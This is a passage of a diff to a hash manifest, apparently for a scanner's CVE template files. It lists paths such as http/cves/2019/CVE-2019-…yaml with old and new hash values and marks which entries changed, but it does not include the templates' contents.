+http/cves/2019/CVE-2019-10758.yaml:a493c95b1ced153cc220affe289ce0b8dbe4a682 +http/cves/2019/CVE-2019-11013.yaml:7645109c12382c407d1f71a6f794039896f4541b +http/cves/2019/CVE-2019-11248.yaml:0cb17542db4376debd23d49b39a26a371810f73c +http/cves/2019/CVE-2019-11370.yaml:5554bce6da78e56ab269e3af0f1b101374ced470 http/cves/2019/CVE-2019-11510.yaml:2ce7148f765bc7b8687cb114d50b35f5535d6e83 -http/cves/2019/CVE-2019-11580.yaml:4e368cd016362644782235b7fab274e8aaffbf2f -http/cves/2019/CVE-2019-11581.yaml:9e7b83c9d58e9b4e0ffd4cff4a24934328e5339a -http/cves/2019/CVE-2019-11869.yaml:9d68761dff622e3cbda242fdad4fbb88d9949104 +http/cves/2019/CVE-2019-11580.yaml:438286a520199c6eccba6f7cbfe152c80bfe2db9 +http/cves/2019/CVE-2019-11581.yaml:25b14dd8be406d8d2295339809dd18a243862a64 +http/cves/2019/CVE-2019-11869.yaml:da0e900e46793966f511e709a81b89f7e4d61e6f http/cves/2019/CVE-2019-12276.yaml:b16079992208eee3bb8cd16c6971bbc935151295 -http/cves/2019/CVE-2019-12314.yaml:2bbf9c931d5aaf66fab372cd4110b6e8b2a5b40d -http/cves/2019/CVE-2019-12461.yaml:d1d414912fa627ee2686f9ab56df4f1dc56de648 -http/cves/2019/CVE-2019-12581.yaml:585ba5b37647db7055a77d560128d850d8146885 -http/cves/2019/CVE-2019-12583.yaml:4c74df0063f82a03832da0cb348d092eec680925 +http/cves/2019/CVE-2019-12314.yaml:6b8b581bfe24ae978fe85de0ce1ebd47a4b3661a +http/cves/2019/CVE-2019-12461.yaml:8b5927aad72213be8dc3f8b5a1bd7d3063f34e71 +http/cves/2019/CVE-2019-12581.yaml:f31cf5a2dd00791f5f3fb711fab4442ad3f44805 +http/cves/2019/CVE-2019-12583.yaml:b890adbbb22e1ba4452af0f3a3c5e90ef9461a12 http/cves/2019/CVE-2019-12593.yaml:2ac02535a3f58d1c56c1e2e4ca9b4311367923c6 -http/cves/2019/CVE-2019-12616.yaml:4d6775c502006aeccf8e87f3a2034bc6155c49fa +http/cves/2019/CVE-2019-12616.yaml:83232136d2782a6ea298e773dd485d40bb8a5e0f http/cves/2019/CVE-2019-12725.yaml:9bf59d3a66b3c9d1efbf6521f07bef965727e7c9 -http/cves/2019/CVE-2019-12962.yaml:aeacbbcd9e43aec8b1581c9432961fcc9805124b +http/cves/2019/CVE-2019-12962.yaml:680b3fd5b7763c34a4a2f5b281b9136e8c9fa969 http/cves/2019/CVE-2019-12985.yaml:f8ccb9f96a7753da176124e29f44884b114f3f83 http/cves/2019/CVE-2019-12986.yaml:bdd2b567c3d1a1f8872f4977f0bdb676dcd2dd83 http/cves/2019/CVE-2019-12987.yaml:34475cae13ddb6ed6d2876a8577427e15c19f8ac http/cves/2019/CVE-2019-12988.yaml:ed150b7eac970eccbcd13a891875fdc27724cb52 -http/cves/2019/CVE-2019-12990.yaml:13b69c3d25c7fb3c3455d4bd7d024bd9864566be -http/cves/2019/CVE-2019-13101.yaml:801d78a46ae2e3a24b01acf74515cd8bba8447e5 -http/cves/2019/CVE-2019-13392.yaml:16edb1dd922ff50114e5763f4377b82fdb361d16 -http/cves/2019/CVE-2019-13396.yaml:c3ec668c84640e0d36cf2a21bcbf8e40d18b51fe -http/cves/2019/CVE-2019-13462.yaml:a4fcf186613f96e22ed90504c567eda1fdb6b815 -http/cves/2019/CVE-2019-14205.yaml:cfd99c74d6114d5800cb22dfe6b5983ba61cba71 -http/cves/2019/CVE-2019-14223.yaml:e65092cffb0f989cf6f0d33aeb9ee07e4e07cf64 -http/cves/2019/CVE-2019-14251.yaml:af812432be4ec1ae0a8d12c7a4045aec10116e79 -http/cves/2019/CVE-2019-14312.yaml:b55fe10f7d0133804f96b7e7f21627358b192d8e -http/cves/2019/CVE-2019-14322.yaml:12cff02d4b12db1e9e282f961843e99873d284fd -http/cves/2019/CVE-2019-14470.yaml:5c68133fe3088e2b7bbb5dc039379f7daa1dabea -http/cves/2019/CVE-2019-14530.yaml:420d566e9fb61d8ab7068933a743776a35e079ee -http/cves/2019/CVE-2019-14696.yaml:bce320ac51adf47b9d017f19b052161ab9e5a232 -http/cves/2019/CVE-2019-14750.yaml:7162aaf31fb42deecccb0af3c0780b6fefd72d2b -http/cves/2019/CVE-2019-14789.yaml:0596047c94170a8f81b755451223d1d346f11f10 -http/cves/2019/CVE-2019-14974.yaml:e84c3545c2dbd1044110d60826a21f3afea018c3 -http/cves/2019/CVE-2019-15043.yaml:b3a7ae3ed79020e3d54b40b848f16e34867870ee -http/cves/2019/CVE-2019-15107.yaml:95c92d672b46a125608a22be9c69305ec5724bae -http/cves/2019/CVE-2019-15501.yaml:3d5c6e30fb0c79381b61cffa8f237e01f0bf10b5 -http/cves/2019/CVE-2019-15642.yaml:4889e2b33f85585db34d680a17e940594e13c559 -http/cves/2019/CVE-2019-15713.yaml:a258272605464fa13fa0cfece7414e9d0c9ac82d -http/cves/2019/CVE-2019-15811.yaml:a25519c6110cdf0933e6689c65d9572fb232e73f -http/cves/2019/CVE-2019-15829.yaml:62de40dec2bd2e8790cfac45e625d8810d3d1f20 -http/cves/2019/CVE-2019-15858.yaml:1959156c761da962b63eae01185246e844e73cca -http/cves/2019/CVE-2019-15859.yaml:2cb3b9f37c90aeca1e950376adedd2d4f27d3378 -http/cves/2019/CVE-2019-15889.yaml:86ed94ed9874f1554106c5d58f583f95d907292f +http/cves/2019/CVE-2019-12990.yaml:b483906f4d02fd01735fe93e2889695a516b27ec +http/cves/2019/CVE-2019-13101.yaml:146103a5331619269470ed28e0b1522d616f24af +http/cves/2019/CVE-2019-13392.yaml:50d753e7df669f912c1b1980bd17e2a91d82ea4e +http/cves/2019/CVE-2019-13396.yaml:82db7fff3414679ce625b3f94ba11d49d9e50504 +http/cves/2019/CVE-2019-13462.yaml:454ba583f8409a1398ddc9606d2e9fa3e904426c +http/cves/2019/CVE-2019-14205.yaml:f8730884be365c88937fdf316c6591b50d9f87d2 +http/cves/2019/CVE-2019-14223.yaml:da4c929337c4e579586f5400ba5fdf8f2b30fade +http/cves/2019/CVE-2019-14251.yaml:c73dc309434f2d07e544bb4e42eb6d123004fe95 +http/cves/2019/CVE-2019-14312.yaml:e75e921d0bccc27e77b8c271da18deed336ace8d +http/cves/2019/CVE-2019-14322.yaml:c1b006b4a13120b7151d62b54150b317f4c93b49 +http/cves/2019/CVE-2019-14470.yaml:8673c3656b71ddc3cdc88f6fb5e93adddbfbfc87 +http/cves/2019/CVE-2019-14530.yaml:8d191dd372f4d69e0c00754faf72dead70ddf6bd +http/cves/2019/CVE-2019-14696.yaml:5879b8aaef14ee602ba6f3af49b0cb25742bef6d +http/cves/2019/CVE-2019-14750.yaml:9c4ad87cab34f76ea10cf5490bc02c11b54e3c9a +http/cves/2019/CVE-2019-14789.yaml:f65e8a2141c545872eedb32b9acbac36fb9089c1 +http/cves/2019/CVE-2019-14974.yaml:8d04f08dff13333d6b13ccceda73fbdbe768ba5d +http/cves/2019/CVE-2019-15043.yaml:4f79dd795b2d3d67c2c279efcc2bfc5f73bd3f60 +http/cves/2019/CVE-2019-15107.yaml:bcd32ad39541f465a08cdfd231c8dd17f41cc979 +http/cves/2019/CVE-2019-15501.yaml:1cd9a15f6a00e124f0e5da8f105f41ba3aecde9e +http/cves/2019/CVE-2019-15642.yaml:9c1cbfec29125cd8f299cfdf5c3dcc5e0c5147af +http/cves/2019/CVE-2019-15713.yaml:e641b80fdcbc98803310a1360079ab5cf1d5259a +http/cves/2019/CVE-2019-15811.yaml:6f61dee41e92bfe94005b0438aa85863282b052d +http/cves/2019/CVE-2019-15829.yaml:c43772e12dbb44d01b6a2027a0316b5823cfc200 +http/cves/2019/CVE-2019-15858.yaml:db370d1897bf0322d3d09c10ee958dfc1893b75f +http/cves/2019/CVE-2019-15859.yaml:0cecd838b4b4a9287195d1544cb03e1a5c68d7e0 +http/cves/2019/CVE-2019-15889.yaml:c59f142336c1d90e6c87a7863bb2c2bbd997db77 http/cves/2019/CVE-2019-16057.yaml:d24ec2b3815bbb7e0e702b8be13d5d7773884a6b -http/cves/2019/CVE-2019-16097.yaml:e62d300c3801144a830e59afd1304174daee1d84 -http/cves/2019/CVE-2019-16123.yaml:1285cd2f5d4b49ae096589801356540b9881a519 -http/cves/2019/CVE-2019-16278.yaml:344e0bc75430dad8156bd685afe6fdbf7b89ee37 -http/cves/2019/CVE-2019-16313.yaml:934a0a88e875cf40ee122f070b283fd96e56f1c6 -http/cves/2019/CVE-2019-16332.yaml:f6f478e2a686ba9eb5c8078684ae6c67aa09551d -http/cves/2019/CVE-2019-16525.yaml:b4b68d7f696cbde903c40984328983734eb52b72 +http/cves/2019/CVE-2019-16097.yaml:261b1cbe3f6dec5dd82346a62e4bb848e921a58e +http/cves/2019/CVE-2019-16123.yaml:c55f19995bb522a95fa7639c829463b1a1a5ff46 +http/cves/2019/CVE-2019-16278.yaml:b72fcd650e373891fda06c2e79817b03c1aa2498 +http/cves/2019/CVE-2019-16313.yaml:e99871627505e1e5ea4efece2983c957817a4cd2 +http/cves/2019/CVE-2019-16332.yaml:6afabff7ffa6ea830ef06b5b6d2f969e180ddd3c +http/cves/2019/CVE-2019-16525.yaml:d3137f3e15a1a05ba2d4ff011a0e7f8a445f0f7b http/cves/2019/CVE-2019-1653.yaml:9e347a5ccde409210fa1405799c0dac626118c5a http/cves/2019/CVE-2019-16662.yaml:c9b4f01ec8654736091cf91d87a68b85f9f39fdb http/cves/2019/CVE-2019-16759.yaml:970217cab18ec1954ebdbc242095d5c821f82088 http/cves/2019/CVE-2019-16920.yaml:6be8f64806236036dae115fc91793a7207c07d56 -http/cves/2019/CVE-2019-16931.yaml:86089301a19dbecd5ffc099e7391d1cadfd166c0 -http/cves/2019/CVE-2019-16932.yaml:d6268dd122cd2621fc9ef024e52dedd2d3a2abf0 -http/cves/2019/CVE-2019-16996.yaml:b55696742ba7628b46424936ac1142f7579bc102 -http/cves/2019/CVE-2019-16997.yaml:a901cb8aef2d187c66c6f71922e0f4050fd331c4 -http/cves/2019/CVE-2019-17270.yaml:30235a72383b518418b1c752e57d2937701be621 +http/cves/2019/CVE-2019-16931.yaml:f157cdda448eae985a71e4eea4e890a517a04be6 +http/cves/2019/CVE-2019-16932.yaml:9e903575f60f6e6f3609f41154a9ddeae5e85ba0 +http/cves/2019/CVE-2019-16996.yaml:f2864f7842f329b1adadbf90baf1a025028d9fc6 +http/cves/2019/CVE-2019-16997.yaml:1f416a6375e2cea74e0c14a424723b65e7e4cdf3 +http/cves/2019/CVE-2019-17270.yaml:90b60b6d0c3d1f4dfa174644d848ae02a16f96ef http/cves/2019/CVE-2019-17382.yaml:6206536e62e28a68a7f727c43605740c913cee4b -http/cves/2019/CVE-2019-17418.yaml:23f87429b173d075ec4ccf8601c8baed661344a8 -http/cves/2019/CVE-2019-17444.yaml:68ee3a20106e526e28c5c58b52bbe6343c312f38 -http/cves/2019/CVE-2019-17503.yaml:b0fc2807efd59f9738cc7aa1fa2ac80b92fbe39c -http/cves/2019/CVE-2019-17506.yaml:29bd5e2ddff261e8233a88d011c27308e79ed670 -http/cves/2019/CVE-2019-17538.yaml:0add00aaa5b51792054b1c8b31402172cd2dc421 +http/cves/2019/CVE-2019-17418.yaml:efd65a8d1cf3d82e7a60f8684ab416354364e0a5 +http/cves/2019/CVE-2019-17444.yaml:eac0c46470d7347cf221a1048b3aa88daba46546 +http/cves/2019/CVE-2019-17503.yaml:501907852904426eb4b5eb454338d97fc20fc903 +http/cves/2019/CVE-2019-17506.yaml:fe11b7edc4df5d12c46576087144df63cc5371dd +http/cves/2019/CVE-2019-17538.yaml:2e388082c92f84e566ae58c57ca822b364e3a973 http/cves/2019/CVE-2019-17558.yaml:5999a649e06f781cb530d1bd2e30dd2e8f844268 -http/cves/2019/CVE-2019-17574.yaml:5894b04db062e46fefdb869eb3d5b5235e54f43d -http/cves/2019/CVE-2019-17662.yaml:ca8492644172af8cc398d7eb3f996458f6e063e2 -http/cves/2019/CVE-2019-1821.yaml:5aea2029d8a56e935c833c7e798e5c8b029e0445 -http/cves/2019/CVE-2019-18371.yaml:6e33bb9372fe827d2d778200164d740e55d33c3b -http/cves/2019/CVE-2019-18393.yaml:01404da65b0a3f7927f716dc1945a686ef04fa1c -http/cves/2019/CVE-2019-18394.yaml:28f12935c49886c4743b7fa6915cfcce22dc49eb -http/cves/2019/CVE-2019-18665.yaml:dc34d514e7748eb94934bb3d734633dd427979e5 -http/cves/2019/CVE-2019-18818.yaml:d1368c41d7d4eaa90deb08daf91019bd014d75c3 -http/cves/2019/CVE-2019-18922.yaml:b2e671d513ef6421309213aa9968ab694e483d38 -http/cves/2019/CVE-2019-18957.yaml:4993b11caaa6e88f7ea4a868217b70ec85d3eb70 -http/cves/2019/CVE-2019-1898.yaml:bc67b398d4d46930e6b472094bb264be9386f7c4 -http/cves/2019/CVE-2019-19134.yaml:09312581c8f63945bce955b8c658c688d95b0f56 -http/cves/2019/CVE-2019-19368.yaml:6e88ecb51c0f3dadaf3e854cc24c85c9a833bb11 -http/cves/2019/CVE-2019-1943.yaml:acd7dca7b8dac4649d90fead2fd829d2365b9ebb +http/cves/2019/CVE-2019-17574.yaml:a099b61fd43f2f2151c957c40913546935d641e1 +http/cves/2019/CVE-2019-17662.yaml:9b95c83ac48e1a203ca23cef2c91b8a74d08cf92 +http/cves/2019/CVE-2019-1821.yaml:f6223fc0419e2dc69567f32ef4c2d1c8939bbbab +http/cves/2019/CVE-2019-18371.yaml:b50847b46f9c23d6667928cb518db691f38e8a67 +http/cves/2019/CVE-2019-18393.yaml:f61efc3c689cf39a6446fadc3cfc8b64671111a6 +http/cves/2019/CVE-2019-18394.yaml:fb6498f05f310cfaa308c9562aeda9025aeea877 +http/cves/2019/CVE-2019-18665.yaml:f54c9066102eae04cb8afbefc903a03372d7b80b +http/cves/2019/CVE-2019-18818.yaml:d58827e60ffd66cc406534a9d861427ceffdc07c +http/cves/2019/CVE-2019-18922.yaml:ddb7f9f2213d513d15e73bb6226a4009a1d98f4c +http/cves/2019/CVE-2019-18957.yaml:2ba1afcced34ac328912be2b04343d68680b2522 +http/cves/2019/CVE-2019-1898.yaml:d5c68f28b993aee163870deddcbb33a3a2fccbd7 +http/cves/2019/CVE-2019-19134.yaml:2ecb4c6ec9c15f38fa0711f279bbc4652d9c7e65 +http/cves/2019/CVE-2019-19368.yaml:ddef91b24e9139768d1d521310b3982b5fe296d2 +http/cves/2019/CVE-2019-1943.yaml:7ae519b2ccb6c8bd5d85396267445deb835f6a14 http/cves/2019/CVE-2019-19781.yaml:77ca0fbff8c53656aafc4f2f100d49045794a8f9 http/cves/2019/CVE-2019-19824.yaml:f59400e9c0ebc6dd183c801de5ca562c30f0a94e -http/cves/2019/CVE-2019-19908.yaml:2c3ce5e6ce8e120995a61c36c184d6bb50261e53 -http/cves/2019/CVE-2019-19985.yaml:95668574ee02161603124578ba18863bbcd93f65 -http/cves/2019/CVE-2019-20085.yaml:fb58dddf26f4388a6e14f82fc1561c8d985f03bc -http/cves/2019/CVE-2019-20141.yaml:2a57696d46c96b51ae2172018eff890b80f2eb4f -http/cves/2019/CVE-2019-20183.yaml:7b697ee644efc731d0fe3bf93e9577f144f40cf4 -http/cves/2019/CVE-2019-20210.yaml:2dbe00b395184275f774b0cb1d3058c3dfff0ef7 -http/cves/2019/CVE-2019-20224.yaml:a68b24c2a01b343d1816440ccf77ff83b1790276 -http/cves/2019/CVE-2019-20933.yaml:c9b4ad05e2522393030da2be0913c8aa1b9eb572 -http/cves/2019/CVE-2019-2578.yaml:304f8313d622b61d7375e84e18ff70ff8c53fedb -http/cves/2019/CVE-2019-2579.yaml:d4c3e6cfc7ef0d5f1f581288d70d1b6b647548e9 -http/cves/2019/CVE-2019-2588.yaml:96dba19cdb14a9475baf4c9b13152c090ee0415a +http/cves/2019/CVE-2019-19908.yaml:1a568a4ab2f2ef4e7481d762009d43ccab91bf85 +http/cves/2019/CVE-2019-19985.yaml:540b11ec54eaeb0c4db193b920d3245a547fdc69 +http/cves/2019/CVE-2019-20085.yaml:a3c468df94bae45c4f59fd3bc8293b1459e8b19b +http/cves/2019/CVE-2019-20141.yaml:b3f64b7e23245b0b35a859dea9bef56e065e77e3 +http/cves/2019/CVE-2019-20183.yaml:7e2ac7552568f0e8124698080a8678de270bb974 +http/cves/2019/CVE-2019-20210.yaml:5649f3f73f94a17434a0066c1868ee8aee96abab +http/cves/2019/CVE-2019-20224.yaml:26741c4835e06fad39b09f8892e4b78e296fe919 +http/cves/2019/CVE-2019-20933.yaml:d55d98492100280bf2854eab0847c5b8cf232f7f +http/cves/2019/CVE-2019-2578.yaml:26d731d544ccc1620556e9f9c837b2146728548a +http/cves/2019/CVE-2019-2579.yaml:ff38b9a2ec6b271ff6bf466f714a9c72520779ef +http/cves/2019/CVE-2019-2588.yaml:3ff6c1a33a1a469121dd0294026d3b3dc940646a http/cves/2019/CVE-2019-2616.yaml:52b36a19622d3af8c361088dac073f40d113233a http/cves/2019/CVE-2019-2725.yaml:22b86011e9796d41e1d97ac5c78d0e153a2e539b -http/cves/2019/CVE-2019-2729.yaml:acab1c146d7eb67fcb93ccb228f1b5a56b0c3d06 +http/cves/2019/CVE-2019-2729.yaml:79149fbba8dd9ded990f3dfd1357cd3b15f22744 http/cves/2019/CVE-2019-2767.yaml:b3ef0216f6e79eafd6a3e06e0b7b2459f23e3222 http/cves/2019/CVE-2019-3396.yaml:8443caeaea63117cd1a6d64364a9480e11348860 http/cves/2019/CVE-2019-3398.yaml:162d020f2ba081570fefd290cf53d15bc92d17b1 -http/cves/2019/CVE-2019-3401.yaml:98b3172151a8b36b78182f58f920e6d1756cd037 -http/cves/2019/CVE-2019-3402.yaml:e36d34fe02b2ae84ff72269b2a442ba6c776a4f3 -http/cves/2019/CVE-2019-3403.yaml:96bb2c20782c0616fa68192c85e58a9f00bad9b1 -http/cves/2019/CVE-2019-3799.yaml:9e1c43f9c1c67f6e93570fb86dc54cc469b44a82 -http/cves/2019/CVE-2019-3911.yaml:6b084933e3e171d1ec741074e0d96f2cdbfb7744 -http/cves/2019/CVE-2019-3912.yaml:e2215093d48ddccb1561f95dbc82d60a5d683fcf -http/cves/2019/CVE-2019-3929.yaml:751c4566f0457506d28d6b655946c40fcac14d94 +http/cves/2019/CVE-2019-3401.yaml:9b9fd8e21146635274f49cc17c6de213c23818f7 +http/cves/2019/CVE-2019-3402.yaml:e79b04994ab27e487e01c5fb6a99c21ddfdaf731 +http/cves/2019/CVE-2019-3403.yaml:d8362dbf327846c0e431b87c7b1cd3d153943c8b +http/cves/2019/CVE-2019-3799.yaml:c25e214b4cda493822f6c88128619bd181fd79fe +http/cves/2019/CVE-2019-3911.yaml:d0c9b97c3b42383f38bd3ed623552a1c81d3638e +http/cves/2019/CVE-2019-3912.yaml:24220934e4642fed6443477fc01d8c04ea58d93b +http/cves/2019/CVE-2019-3929.yaml:982a70e793ce8f3d92abf2e3f6ae9d93cffdb06a http/cves/2019/CVE-2019-5127.yaml:33661abc937e1502b2c81106fd2b923f5e8e07fa http/cves/2019/CVE-2019-5418.yaml:af76701fa7ba485637689f6d96a37d8cf325b195 -http/cves/2019/CVE-2019-5434.yaml:20838aa16da692bd252f175b47235ab309d86b45 -http/cves/2019/CVE-2019-6112.yaml:47884a3d3d526e6101fa481e3acef3c798eb69ce -http/cves/2019/CVE-2019-6340.yaml:4431ecf3593cf2582f991209de53d16391c4c874 -http/cves/2019/CVE-2019-6715.yaml:dff25399626083ac86c0d88703e00229b5374efd -http/cves/2019/CVE-2019-6799.yaml:db1588827d5bff56b522e880b965a80ac4fcb955 -http/cves/2019/CVE-2019-6802.yaml:7fb686cc6f69c90fcc0d42996e3d6ac9296364a6 -http/cves/2019/CVE-2019-7192.yaml:733f264066990d6afcc0b3475976a1ffd964b6d7 -http/cves/2019/CVE-2019-7219.yaml:406a4683ee4d6694233658377a7edefc48c3544c -http/cves/2019/CVE-2019-7238.yaml:237d9cfea9bd08b999e14e4393ecac6aebaaa864 -http/cves/2019/CVE-2019-7254.yaml:b954f7cb5c3948cefc4e2a6d0ba41df6046ffe8b -http/cves/2019/CVE-2019-7255.yaml:32dca705c6ca35aa1fc151f66f81a66e77f9f303 +http/cves/2019/CVE-2019-5434.yaml:63ab4e5e746cee7614fd630a0a6b62e2d120940f +http/cves/2019/CVE-2019-6112.yaml:b019eab0dd599d7046cafd59568b7de43fd6d171 +http/cves/2019/CVE-2019-6340.yaml:3a275004643e8032a336da935924ad2ebc9fa88f +http/cves/2019/CVE-2019-6715.yaml:600d408f6bfbd340bec584e81e24d50e30ea22f5 +http/cves/2019/CVE-2019-6799.yaml:04a5aa57863b47f5abd7805d17f82e2edb9e7ebb +http/cves/2019/CVE-2019-6802.yaml:1bf8c9e62eaad3943d3af95576359c65fbf07506 +http/cves/2019/CVE-2019-7192.yaml:678f9f6b5b11331a2f3aabe5cc9af60ee0bfb366 +http/cves/2019/CVE-2019-7219.yaml:f70f67b5e4cbfb85fba5332e55184e4c4923f6f4 +http/cves/2019/CVE-2019-7238.yaml:26ec8ab57424250d68b46f2211ad87784c504776 +http/cves/2019/CVE-2019-7254.yaml:915f73812ee3bb7ceff79bffff3e058aad5d223b +http/cves/2019/CVE-2019-7255.yaml:1e2dccc12a4c4ab7c2a9b06f3e25af1f940b0c8a http/cves/2019/CVE-2019-7256.yaml:58cc721331c31d795c297747d26858941fe5c9b7 -http/cves/2019/CVE-2019-7275.yaml:9a601dd7b71c04c828a4c97cc98948769c109f89 -http/cves/2019/CVE-2019-7315.yaml:a189936d8a07f0b9ed1fe3464fdabe7277286e27 -http/cves/2019/CVE-2019-7481.yaml:6aa0c3aea364c52cd39ad7ece2544ad77332044f -http/cves/2019/CVE-2019-7543.yaml:838a82d20efed1a16f49d27054d2e77248023cee -http/cves/2019/CVE-2019-7609.yaml:335c3c6419d2231eb306781c0db0ba0c4e95b6b5 -http/cves/2019/CVE-2019-8086.yaml:089230353e8a3ffe7b165c0fdfa63a0a20b79b78 -http/cves/2019/CVE-2019-8390.yaml:643a14433e6127af7d213bfe662d71686c538444 -http/cves/2019/CVE-2019-8442.yaml:b4b3c167d895b6abf09c2dba44908aef80762654 -http/cves/2019/CVE-2019-8446.yaml:2115a90670746e7515ad5baf5bd33ba1f5305bf3 -http/cves/2019/CVE-2019-8449.yaml:cf12abc70e678238d86e4fc5e32da295440eeffe +http/cves/2019/CVE-2019-7275.yaml:4c42324bdccc9305a80c66806e4baffba281e706 +http/cves/2019/CVE-2019-7315.yaml:e0128f39ed6739c71d588873864b9bf6926eb7c0 +http/cves/2019/CVE-2019-7481.yaml:c4c8643a50faf6d19d0a67c228624a19312765aa +http/cves/2019/CVE-2019-7543.yaml:fd033c98c05cba68864853ef4d45a047b5f8c4a8 +http/cves/2019/CVE-2019-7609.yaml:70e847442fb392e676099846b0764bc90262bd07 +http/cves/2019/CVE-2019-8086.yaml:605fa2545ca731a56a771e7ae5657601d37537b8 +http/cves/2019/CVE-2019-8390.yaml:57b4710ff2a1c49b25def4a9808a9bbeac7e0916 +http/cves/2019/CVE-2019-8442.yaml:354f7314588937bea3dabcf550ca1878baf610d1 +http/cves/2019/CVE-2019-8446.yaml:b573cf8e7277819b1d8f83e4a0b423576f8c1a43 +http/cves/2019/CVE-2019-8449.yaml:126243a0860036af19d7286101cf67c1365ec128 http/cves/2019/CVE-2019-8451.yaml:43e17eb213a838155503d82502c237d524ccb68c -http/cves/2019/CVE-2019-8903.yaml:bb59a545453c62e31dbcd5a638d2a29bcea8e365 -http/cves/2019/CVE-2019-8937.yaml:58585634a0720d4a60a2cec3ffb3b07001ca38d5 -http/cves/2019/CVE-2019-8982.yaml:cfe93a775948588cbefab3973aba00bd823d851b -http/cves/2019/CVE-2019-9041.yaml:d0b4b978379c85e1d4c4d27cd62427ca87fa9f98 -http/cves/2019/CVE-2019-9618.yaml:781328bfa13327128d93c148fc03548ae1385b8a +http/cves/2019/CVE-2019-8903.yaml:82bc07b4cd3e56077c568f8aaa95b5f62e8a62a9 +http/cves/2019/CVE-2019-8937.yaml:3dd009b93d5c2f8068e5fdc0ea0dc9a981ceb972 +http/cves/2019/CVE-2019-8982.yaml:75cc256930be06098fbe608da02fc967006faba9 +http/cves/2019/CVE-2019-9041.yaml:eadb6c35d0a30be2c7728e38ded4266b9a68e2b1 +http/cves/2019/CVE-2019-9618.yaml:f3ebf42a9c46ccc9d27f4304c9f45e9556c4f92c http/cves/2019/CVE-2019-9670.yaml:341d12e638e00cbf1829d67e049da70d367db1c7 -http/cves/2019/CVE-2019-9726.yaml:8720262708ccaed906882edd3e75be428a6a3e28 -http/cves/2019/CVE-2019-9733.yaml:a45f0889423518196e7d56b5545c76102a31c82c -http/cves/2019/CVE-2019-9915.yaml:2de5cd22f0cef0b561175f9cfc4f1a6a13cd860e -http/cves/2019/CVE-2019-9922.yaml:0de4b13790f3071cf538ef3d2cc7f5e3f01aeebb -http/cves/2019/CVE-2019-9955.yaml:32f62f62a557a8221264448cf0bbf9b9dc4d19d3 +http/cves/2019/CVE-2019-9726.yaml:7df6e0f1b9565cfed4948ea3ceb158b5f9051dda +http/cves/2019/CVE-2019-9733.yaml:e5963ca06d06b7f14e443b808266e8973db0b30b +http/cves/2019/CVE-2019-9915.yaml:6d668c9aa4e4f05dd7199e16ce715701a35d06ad +http/cves/2019/CVE-2019-9922.yaml:0849fec1ce66eea60478d89f2497d880007a71e7 +http/cves/2019/CVE-2019-9955.yaml:ac273e5cfc1470d168ddef55155e8732213fbacb http/cves/2019/CVE-2019-9978.yaml:e85dbefabd52e8fa0fe20796aa448c24ef439dbf http/cves/2020/CVE-2020-0618.yaml:2a1354cce8162a667175e738f3724bffd7a6c5e1 http/cves/2020/CVE-2020-10148.yaml:f38f44f19ef3fdbfbee0cd156d1ce81cc89e0736 -http/cves/2020/CVE-2020-10199.yaml:f223a08e76bf7ed5839c6cd960c68697661b8fa3 -http/cves/2020/CVE-2020-10220.yaml:6cbfe5f3f1d52d5ccb83678df05812bee1b05bc9 -http/cves/2020/CVE-2020-10546.yaml:fa433735e907ba98ea36c715730e32a429e752e4 -http/cves/2020/CVE-2020-10547.yaml:223e86862efa1a58306d557283ff58886b8bed34 -http/cves/2020/CVE-2020-10548.yaml:bdabf7eaa816f61acbfe3ee0879c6f5ad1e6a0dc -http/cves/2020/CVE-2020-10549.yaml:899f6dbee7f3caf8b8a8f64c41f460ca24a7ec41 -http/cves/2020/CVE-2020-10770.yaml:2916972f833961b664cc588f02f4583d7ba01e0b -http/cves/2020/CVE-2020-10973.yaml:bcc276b5c4e323cf472fdb852e6786234ff50e1d -http/cves/2020/CVE-2020-11034.yaml:ea7f3b04b34bf47c12f91352a8ab2bba34053319 -http/cves/2020/CVE-2020-11110.yaml:eba4faa7e5feaf6128743790f85f15394279e8b3 -http/cves/2020/CVE-2020-11450.yaml:bd0f2190b0168298f3d057edea75a629e1fbd858 -http/cves/2020/CVE-2020-11455.yaml:3af5aad304b3c4a48b7861781e99dd1cf8db5406 -http/cves/2020/CVE-2020-11529.yaml:7b9cc57c34f1c8929f0c644fab63d1ff3d37346d -http/cves/2020/CVE-2020-11530.yaml:bbd63e23e10e022d4ca5f77291b9dfaa1b187efe +http/cves/2020/CVE-2020-10199.yaml:84ec9e5d02855fe5cd305d3999d05c9e68231b0a +http/cves/2020/CVE-2020-10220.yaml:40ed67ebab3312374258c97f556f0f7a09fd7a86 +http/cves/2020/CVE-2020-10546.yaml:478572ed141f184f721052f0c4d1471f4d6a1093 +http/cves/2020/CVE-2020-10547.yaml:af9dda1bb71d5309886ba2aa9d89323b015bc869 +http/cves/2020/CVE-2020-10548.yaml:1459cd2cbc0d016a2fc8982112584bf7e1249ecd +http/cves/2020/CVE-2020-10549.yaml:28777425badbe08699a054f017630964b04ad09c +http/cves/2020/CVE-2020-10770.yaml:d4f45572b7ea8963deebdeef9b7968a519bb5d7d +http/cves/2020/CVE-2020-10973.yaml:bdb5973dc61a73b0e5558b5439da3a956988c7a3 +http/cves/2020/CVE-2020-11034.yaml:3147e93fdca6d723eca86728bd0389c6a0905f4b +http/cves/2020/CVE-2020-11110.yaml:842e7f8b5d05ecefbd5b479788e9eadaf16ffdbf +http/cves/2020/CVE-2020-11450.yaml:3898da52e5cd1f7f7356bbb2fc380e2600856354 +http/cves/2020/CVE-2020-11455.yaml:0980bc811d55bed9e19a46af6c6cb1e6f5b4bd0d +http/cves/2020/CVE-2020-11529.yaml:a1773bf73d111a39c6dc60d1b0519541db428d84 +http/cves/2020/CVE-2020-11530.yaml:141832bba71fc11370180ab3596f192e5a48b3b1 http/cves/2020/CVE-2020-11546.yaml:9e82ec6d2c69c59d10b6d497545cd8f74b3d09fa -http/cves/2020/CVE-2020-11547.yaml:82f58678b26366623aff33e93007a35196016715 -http/cves/2020/CVE-2020-11710.yaml:89a1926bc73de4e879c44d3994759ad3cc9bf2d5 +http/cves/2020/CVE-2020-11547.yaml:60b1f1439ae05cd19a7a1335df4937d65f55685b +http/cves/2020/CVE-2020-11710.yaml:d9709320583c7d2c07f7980f440a34303dbd51ab http/cves/2020/CVE-2020-11738.yaml:3c17a2a7998bb63dad2915af224bdbb9155e5c47 -http/cves/2020/CVE-2020-11798.yaml:b8878ea0d80b62b01f7ab38e8f9267080b3424f5 -http/cves/2020/CVE-2020-11853.yaml:861aa98d7d25ecc2a9246babe6123d0d3fbc3328 -http/cves/2020/CVE-2020-11854.yaml:0b16013788a78f3f8d671c187c8f62e4f3500045 